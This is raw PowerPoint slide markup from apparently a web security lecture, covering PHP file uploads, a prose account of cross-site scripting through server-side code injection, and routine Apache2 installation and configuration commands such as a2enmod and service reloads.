              <a:cs typeface="Courier New"/>
            </a:endParaRPr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007190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Cross-site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3800" dirty="0" smtClean="0"/>
              <a:t>Scripting (XSS) Attacks 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PHP stores various attributes of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>uploaded file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>predefined variable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$_FILES</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>hen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>a file is uploaded, PHP stores it initially at a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>temporary location </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>accessed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$_FILES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>["file"]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>[”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>tmp_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"] </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>reates </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>another file that is identical to what the client uploaded except for the extra PHP code that is in the statement that ends in line (P) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> [Firefox: tool -&gt; Web Developer -&gt; Page source]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>n </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>intruder broke into the server at the web hosting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>service, and wrote </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>a simple script that would scan all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>files at the server and inject malicious code into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>files in the manner </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>presented </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>olks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>whose HTML web pages would be corrupted in this manner would never </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>suspect </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>that anything was </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>twisted with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>their pages </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ross</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-site scripting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(XSS) attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>with server-side injection of malicious code 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864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Install and Configure Apache2 (1)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To make sure that your Apache2 web server is running, point your browser to the URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>localhost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endParaRPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Browser displays default </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>It Works!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>page (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>www/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>index.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>heck </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>that your web server is running by executing </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> aux | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> apache </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Every once in a while you may have to change the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> file for the web server. When you do that, you’d need to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>reload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> your new configuration into the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>G</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>raceful</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>way is to run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>init.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/apache2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>reload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> as root</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>init.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/apache2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>restart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> to restart </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>the server at which point it would automatically load in the new configuration </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>ain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>configuration file for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Apache2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>HTTPD server is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/apache2/apache2.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, which pulls in more site-specific </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> information from the files in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>directories</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>sites-enabled</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>modes-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>enabled</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/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049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Install and Configure Apache2 (2)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000" dirty="0" smtClean="0"/>
              <a:t>Directories </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>mode-available</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>modes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>enabled</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Before you can use any of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>directives</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>files, you have to first </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>enable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>modules</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> that correspond to those </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>directives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>For </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>example, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>must </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>enable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>module </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>userdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>” before </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>inserting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>the “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>UserDir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>” directive in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> files</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>nable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>a module by executing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>a2enmod </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>module_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>and disable a module by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>a2dismod </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>module_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>a2enmod </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>userdir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// enable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>userdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> module</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>lace </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>the following </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>directives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/>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>apache2.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> file if your web content is going to be in a directory called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>cshen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>its subdirectories that may be named </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>public-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>public_html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty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800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>UserDir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enabled </a:t>
